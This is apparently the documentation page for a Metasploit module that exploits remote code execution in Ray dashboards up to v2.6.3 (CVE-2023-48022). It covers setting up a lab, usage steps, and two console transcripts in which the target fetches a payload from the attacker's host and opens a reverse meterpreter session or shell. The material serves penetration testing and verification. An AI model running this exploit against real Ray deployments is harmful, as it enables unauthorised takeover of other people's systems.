## Vulnerable Application

Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)

The vulnerability affects:

    * Ray (<=v2.6.3)

This module was successfully tested on:

    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

### Install and run the vulnerable Ray (v2.6.3)

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
   `docker pull rayproject/ray:2.6.3`
4. Start the ray container.
   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
5. Start ray.
   `ray start --head --dashboard-host=0.0.0.0`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/ray_agent_job_rce`
4. Do: `set rhost <rhost>`
5. Do: `set lhost <attacker-ip>`
6. Do: `run`
7. You should get a shell or meterpreter

## Options
No options

## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
```
msf > use exploit/linux/http/ray_agent_job_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
```
msf > use exploit/linux/http/ray_agent_job_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/ray_agent_job_rce) > set target 1
target => 1
msf exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```